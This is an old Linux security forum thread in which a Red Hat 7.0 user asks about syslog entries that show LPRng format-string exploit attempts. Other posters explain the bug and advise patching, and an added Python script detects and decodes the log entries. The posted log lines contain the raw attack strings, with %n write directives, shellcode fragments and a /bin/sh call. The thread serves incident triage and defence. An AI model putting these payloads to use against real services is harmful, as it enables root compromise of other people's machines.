LinuxQuestions.org > Forums > Linux Forums > Linux - Security
Linux - Security: This forum is for all security related questions. Questions, tips, system compromises, firewalls, etc. are all included here.
Old 05-01-2001, 07:05 AM   #1
Advocate
RH7.0
This, I read, most likely compromised my root.
What other logs can I look in to try and get an idea of what this person did at 3:30 am last night?
This was out of my /var/log/messages :
******************************************************
Apr 30 03:31:08 linux SERVER[6812]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.152u%300$n%.25u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6813]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.148u%300$n%.29u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6814]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.144u%300$n%.33u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:08 linux SERVER[6815]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.140u%300$n%.37u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6816]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.136u%300$n%.41u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6817]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.132u%300$n%.45u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:09 linux SERVER[6818]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.128u%300$n%.49u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6819]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.124u%300$n%.53u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
Apr 30 03:31:10 linux SERVER[6820]: Dispatch_input: bad request line 'BBXXXXXXXXXXXXXXXXXX%.120u%300$n%.57u%301$nsecurity%302$n%.192u%303$n111F1Ҳf1C]C]KMM1ECf]fE^O'MEEE^PMCCC1ɲ?A^X^u^H1F^GE^L^KM^HU^L/bin/sh'
****************************************************

How can I stop this? Fawwwwwwwk!
 
Old 05-02-2001, 06:53 AM   #2
raz
Advocate,

Someone has "attempted" to get into your system through LPR's logging function.

Doesn't look like they got root access, but they did use the LPRng format string syslog bug, which could allow root access.

So far to my knowledge no one has managed to get root through this bug.

I have one suggestion just in case:
GO PATCH IT NOW....

Then all those nasty messages will go away.

i386:
ftp://updates.redhat.com/7.0/en/os/i....24-2.i386.rpm

sources:
ftp://updates.redhat.com/7.0/en/os/S...6.24-2.src.rpm

Check out the command "last" and work out who was logged on at that time.

Bye,
/Raz
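Added example, not part of the thread and not LPRng's or Red Hat's code: a small Python triage script for exactly the `Dispatch_input: bad request line` entries quoted in the first post. It parses the syslog lines, flags any request carrying a `%n` conversion or `/bin/sh`, and replays the format string the way printf counts output bytes: `%.152u` emits exactly 152 bytes, and `%300$n` then stores the running byte count through the pointer found at argument position 300, so the precisions pick the values written. Replaying the nine entries this way shows the first write dropping by 4 per attempt (172, 168, 164, ...) while the other three stay fixed at 197, 205 and 397, which is consistent with the attacker stepping one address guess 4 bytes at a time. The sample lines are reconstructed from the post with a placeholder where the shellcode bytes were, since those did not survive; the names `Finding`, `simulate_writes`, `classify` and `scan` are chosen here and are not from any tool.

```python
import re
from dataclasses import dataclass, field

# Syslog line as sysklogd writes it on RH 7.0: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<prog>[^\[\s:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
REQUEST_RE = re.compile(r"Dispatch_input: bad request line '(?P<req>.*)'\s*$")
# Only the two directive shapes seen in the posted payload are modelled:
#   %.<prec>u  prints an unsigned int with at least <prec> digits (zero padded)
#   %<k>$n     writes the number of bytes output so far through argument k
DIRECTIVE_RE = re.compile(r"%\.(?P<prec>\d+)u|%(?P<pos>\d+)\$n")
N_WRITE_RE = re.compile(r"%(\d+\$)?n")

# Constructed sample log, rebuilt from the post. The 20-byte lead-in and the
# directive sequence are the post's; the shellcode bytes are a placeholder.
PREFIX = "BB" + "X" * 18
SHELLCODE = "<shellcode bytes, not recoverable from the post>"

def attempt(pid: int, first: int, second: int) -> str:
    # One Dispatch_input entry; only the two precisions differ between attempts.
    return (f"Apr 30 03:31:08 linux SERVER[{pid}]: Dispatch_input: bad request line "
            f"'{PREFIX}%.{first}u%300$n%.{second}u%301$nsecurity%302$n%.192u%303$n"
            f"111F{SHELLCODE}/bin/sh'")

SAMPLE_LOG = "\n".join([
    attempt(6812, 152, 25),
    attempt(6813, 148, 29),
    attempt(6814, 144, 33),
    # constructed benign noise: a malformed but harmless request, and an unrelated daemon
    "Apr 30 03:31:20 linux SERVER[6850]: Dispatch_input: bad request line 'GET / HTTP/1.0'",
    "Apr 30 03:32:00 linux sshd[901]: Accepted password for alice from 10.0.0.5 port 1022",
])

@dataclass
class Finding:
    pid: int
    request: str
    has_n_write: bool
    has_shell: bool
    writes: list = field(default_factory=list)  # (argument position, value written)

def simulate_writes(fmt: str) -> list:
    """Replay the format string as printf would count bytes and return
    (argument position, value) for every %k$n. Assumes each %.Nu value has
    fewer than N digits so it prints exactly N bytes; that holds here since
    N >= 25 and a 32-bit unsigned int has at most 10 digits."""
    written = 0
    cursor = 0
    writes = []
    for m in DIRECTIVE_RE.finditer(fmt):
        written += m.start() - cursor  # literal bytes before this directive
        cursor = m.end()
        if m.group("prec") is not None:
            written += int(m.group("prec"))
        else:
            writes.append((int(m.group("pos")), written))  # %n itself prints nothing
    return writes

def classify(line: str):
    """Return a Finding for a suspicious Dispatch_input entry, else None."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    r = REQUEST_RE.search(m.group("msg"))
    if not r:
        return None
    req = r.group("req")
    has_n = N_WRITE_RE.search(req) is not None
    has_shell = "/bin/sh" in req
    if not (has_n or has_shell):
        return None
    return Finding(
        pid=int(m.group("pid") or 0),
        request=req,
        has_n_write=has_n,
        has_shell=has_shell,
        writes=simulate_writes(req) if has_n else [],
    )

def scan(log_text: str) -> list:
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.pid, "n-write" if f.has_n_write else "", "shell" if f.has_shell else "", f.writes)
```

Point it at the real file with `scan(open("/var/log/messages", errors="replace").read())`; the `errors="replace"` matters because the shellcode bytes are not valid text. Anything it returns is worth lining up, by the minute, against the `last` output raz mentions above.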



 
Old 05-03-2001, 06:36 AM   #3
Advocate
Thanks RazBot

I appreciate you taking the time to view the post.

And not having root compromised was such a relief to see you say!

I have already upgraded to RH7.1 (Seawolf). The one message I didn't post from my log file is as follows:
(this entry was made 30 seconds before the LPRng exploit started happening, would you consider this a likely candidate for the source?)

Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'

Again thanks for your time!
 
Old 05-04-2001, 02:31 AM   #4
raz
Advocate,

I think that log message was not the person entering your system, but it is a message resulting from something they may have done with DIG or NSLOOKUP.

I guess they had been on the system before the time you got the first LPRng bug logs.

------------
Apr 30 03:30:03 linux named[853]: Lame server on '221.239.219.216.in-addr.arpa' (in'239.219.216.in-addr.arpa'?): [216.219.254.10].53 'NS2.VALUEWEB.NET'
------------

The DNS records say that 216.219.239.221 should be a server for the 216.219.239.0 zone, but when 239.219.216.in-addr.arpa was asked for a record in the 216.219.239.0 zone it said that it wasn't authoritative for that zone.
i.e. a zone transfer attempt failed.

Looks like they knew what they were doing.

/Raz

